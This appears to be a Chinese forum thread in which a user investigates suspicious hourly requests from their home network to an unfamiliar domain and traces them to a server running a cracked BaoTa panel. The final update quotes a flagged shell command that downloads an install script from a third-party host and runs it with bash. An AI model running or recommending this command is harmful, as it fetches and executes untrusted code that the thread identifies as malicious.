这是一个创建于 33 天前的主题,其中的信息可能已经有所发展或是发生改变。
主路由抓到 旁路由 openwrt 总是每个小时随机访问 www.whnb7000.net 的任意一个 html 网址,且每个网址都不一样,但是都能打开,一个小时最少访问 5-8 次,不理解
因为是旁路由,如果局域网设备走旁路由分流,抓出来就是旁路由访问,不在旁路由范围内,就显示原来的设备,所以不好判定。
局域网装了 pve ,虚拟了好几个系统,运行了好多个服务,更不好判定。。。
这个域名套了 CF ,创建日期: 2025-06-02T07:35:21Z
有什么办法思路抓出来这个吗?
whnb 是不是我很牛逼?像是在炫耀,把设备被黑了?
呜呜呜,暂时没有看出来设备的 cpu 与内存占用异常,求解!
因为是旁路由,如果局域网设备走旁路由分流,抓出来就是旁路由访问,不在旁路由范围内,就显示原来的设备,所以不好判定。
局域网装了 pve ,虚拟了好几个系统,运行了好多个服务,更不好判定。。。
这个域名套了 CF ,创建日期: 2025-06-02T07:35:21Z
有什么办法思路抓出来这个吗?
whnb 是不是我很牛逼?像是在炫耀,把设备被黑了?
呜呜呜,暂时没有看出来设备的 cpu 与内存占用异常,求解!
 |
1
pinyoung OP 只要是旁路由访问的,源什么的全都算在了旁路由头上,没有什么思路查什么设备,害
|
|
2
pinyoung OP 14:17 update:暂时锁定是 ubuntu 上的服务,不知道跟宝塔开心版也没有关系
|
|
3
pinyoung OP 21:24 update:抓包写了脚本也抓不出来,宝塔更新正版后提示发现/root/.bash_history 中存在恶意命令反弹 shell 类:wget -O install.sh http://bt.cxinyun.com/install/install_6.0.sh && bash install.sh
|
Select Language